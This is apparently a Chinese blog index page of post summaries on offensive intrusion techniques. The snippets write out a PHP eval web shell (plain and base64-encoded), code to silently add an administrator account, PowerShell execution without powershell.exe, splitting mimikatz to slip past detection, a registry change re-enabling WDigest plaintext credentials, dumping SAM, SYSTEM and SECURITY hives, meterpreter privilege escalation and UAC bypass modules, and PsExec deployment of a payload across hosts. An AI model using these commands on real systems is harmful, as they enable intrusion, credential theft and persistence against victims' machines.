摘要: 1.echo直接写入 echo '<?php eval($_POST[1]); ?>' > 1.php 2.base64写入 echo "PD9waHAgZXZhbCgkX1BPU1RbMV0pOyA/Pg==" | base64 -d >2.php 3.绕过重定向符 echo "ZWNobyAiU 阅读全文
posted @ 2021-07-23 18:39 Shadown-PQ 阅读(997) 评论(0) 推荐(0) 编辑
摘要: 原文 https://mp.weixin.qq.com/s/5Iitrfst3TXd8sRCfq6sHw python2,默认添加Test1234,密码Test@1234,组Administrators。 import ctypes from ctypes import wintypes from 阅读全文
posted @ 2021-07-18 22:27 Shadown-PQ 阅读(266) 评论(0) 推荐(0) 编辑
摘要: 通过代码直接调用System.Management,替代powershell.exe c#代码,保存为1.cs: using System.Collections.ObjectModel; using System.Management.Automation; using System.Manage 阅读全文
posted @ 2021-07-17 23:39 Shadown-PQ 阅读(216) 评论(0) 推荐(0) 编辑
摘要: 一、powershell执行策略 Unrestricted 权限最高,可以不受限制执行任意脚本 Restricted 默认策略,不允许任意脚本的执行 AllSigned 所有脚本必须经过签名运行 RemoteSigned 本地脚本无限制,但是对来自网络的脚本必须经过签名 Bypass 没有任何限制和 阅读全文
posted @ 2021-07-15 23:20 Shadown-PQ 阅读(426) 评论(0) 推荐(0) 编辑
摘要: LInux中使用split 以 500 K 大小分割 mimikatz.exe 文件,文件分为几个500k大小的小文件。 split -b 500k mimikatz.exe test 合并分割文件为 mimikatz.exe cat testa* > test.exe # 适用于 Linux、Ma 阅读全文
posted @ 2021-06-30 17:54 Shadown-PQ 阅读(53) 评论(0) 推荐(0) 编辑
摘要: 微软发布了KB2871997补丁,⽤来关闭Win7和08的Wdigest功能,同时Server2012版以上默认关闭该功能,但是仍然可以通过修改注册表的⽅法来⼿动开启。 需要修改注册表。 reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityPr 阅读全文
posted @ 2021-06-30 14:40 Shadown-PQ 阅读(61) 评论(0) 推荐(0) 编辑
摘要: 1、利用卷影拷贝方式获取目标SYSTEM,SECURITY,SAM文件本地离线解密 wmic shadowcopy call create Volume='C:\' 2、powershell 操作注册表导出文件 powershell reg save hklm\system SYSTEM power 阅读全文
posted @ 2021-06-27 14:02 Shadown-PQ 阅读(225) 评论(0) 推荐(0) 编辑
摘要: getsystem meterpreter> getsystem BypassUAC use exploit/windows/local/bypassuac use exploit/windows/local/bypassuac_injection use windows/local/bypassu 阅读全文
posted @ 2021-06-18 14:33 Shadown-PQ 阅读(131) 评论(0) 推荐(0) 编辑
摘要: 先将可出网的一台机设置中转 生成马子,把马子和PsExec传到出网的机子上,之后用PsExec执行命令 PsExec.exe -accepteula \\192.168.241.171,192.168.241.172 -u Administrator -p xxxxx -d -c C:\Window 阅读全文
posted @ 2021-06-18 13:51 Shadown-PQ 阅读(138) 评论(0) 推荐(0) 编辑
摘要: 写不进去主要是因为编码的问题,如果大家想看可以去潇湘信安大佬的公众号去看一下。 Sqlmap中的OS-Shell参数是通过调用windows的cmd.exe执行的命令,在window中cmd和powershell默认位GBK格式,而sqlmap默认是以UTF-8提交的数据包。 OS-SHELL写入方 阅读全文
posted @ 2021-06-10 16:09 Shadown-PQ 阅读(329) 评论(0) 推荐(0) 编辑